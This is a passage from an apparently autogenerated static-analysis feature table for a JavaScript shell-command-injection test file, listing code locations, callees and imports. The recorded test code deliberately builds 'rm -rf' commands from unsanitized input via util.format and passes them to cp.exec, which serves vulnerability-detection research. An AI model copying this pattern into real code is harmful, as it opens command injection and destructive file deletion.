name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:10:102:50 | exceptional return of util.fo ... , name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:10:102:50 | exceptional return of util.fo ... , name) | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:10:102:50 | exceptional return of util.fo ... , name) | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:10:102:50 | exceptional return of util.fo ... , name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:10:102:50 | util.fo ... , name) | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:10:102:50 | util.fo ... , name) | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:10:102:50 | util.fo ... , name) | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:10:102:50 | util.fo ... , name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:10:102:50 | util.fo ... , name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:10:102:50 | util.fo ... , name) | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:10:102:50 | util.fo ... , name) | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:10:102:50 | util.fo ... , name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:10:102:50 | util.fo ... , name) | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:15:102:20 | format | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:15:102:20 | format | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:15:102:20 | format | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:15:102:20 | format | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:15:102:20 | format | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:22:102:43 | "rm -rf ... ar/%s'" | CalleeFlexibleAccessPath | util.format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:22:102:43 | "rm -rf ... ar/%s'" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:22:102:43 | "rm -rf ... ar/%s'" | calleeImports | util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:22:102:43 | "rm -rf ... ar/%s'" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:22:102:43 | "rm -rf ... ar/%s'" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:22:102:43 | "rm -rf ... ar/%s'" | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:22:102:43 | "rm -rf ... ar/%s'" | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:22:102:43 | "rm -rf ... ar/%s'" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:22:102:43 | "rm -rf ... ar/%s'" | receiverName | util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:46:102:49 | name | CalleeFlexibleAccessPath | util.format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:46:102:49 | name | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:46:102:49 | name | calleeImports | util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:46:102:49 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:46:102:49 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:46:102:49 | name | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:46:102:49 | name | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:46:102:49 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:46:102:49 | name | receiverName | util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:2:104:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:2:104:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:2:104:3 | cp | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:2:104:3 | cp | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:2:104:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:2:104:8 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:2:104:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:2:104:8 | cp.exec | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:2:104:8 | cp.exec | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:2:104:8 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:2:104:41 | cp.exec ... name)) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:2:104:41 | cp.exec ... name)) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:2:104:41 | cp.exec ... name)) | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:2:104:41 | cp.exec ... name)) | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:2:104:41 | cp.exec ... name)) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:2:104:41 | exceptional return of cp.exec ... name)) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:2:104:41 | exceptional return of cp.exec ... name)) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:2:104:41 | exceptional return of cp.exec ... name)) | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:2:104:41 | exceptional return of cp.exec ... name)) | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:2:104:41 | exceptional return of cp.exec ... name)) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:5:104:8 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:5:104:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:5:104:8 | exec | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:5:104:8 | exec | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:5:104:8 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:10:104:13 | util | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:10:104:13 | util | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:10:104:13 | util | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:10:104:13 | util | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:10:104:13 | util | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:10:104:20 | util.format | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:10:104:20 | util.format | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:10:104:20 | util.format | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:10:104:20 | util.format | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:10:104:20 | util.format | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:10:104:40 | exceptional return of util.fo ... , name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:10:104:40 | exceptional return of util.fo ... , name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:10:104:40 | exceptional return of util.fo ... , name) | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:10:104:40 | exceptional return of util.fo ... , name) | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:10:104:40 | exceptional return of util.fo ... , name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:10:104:40 | util.fo ... , name) | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:10:104:40 | util.fo ... , name) | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:10:104:40 | util.fo ... , name) | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:10:104:40 | 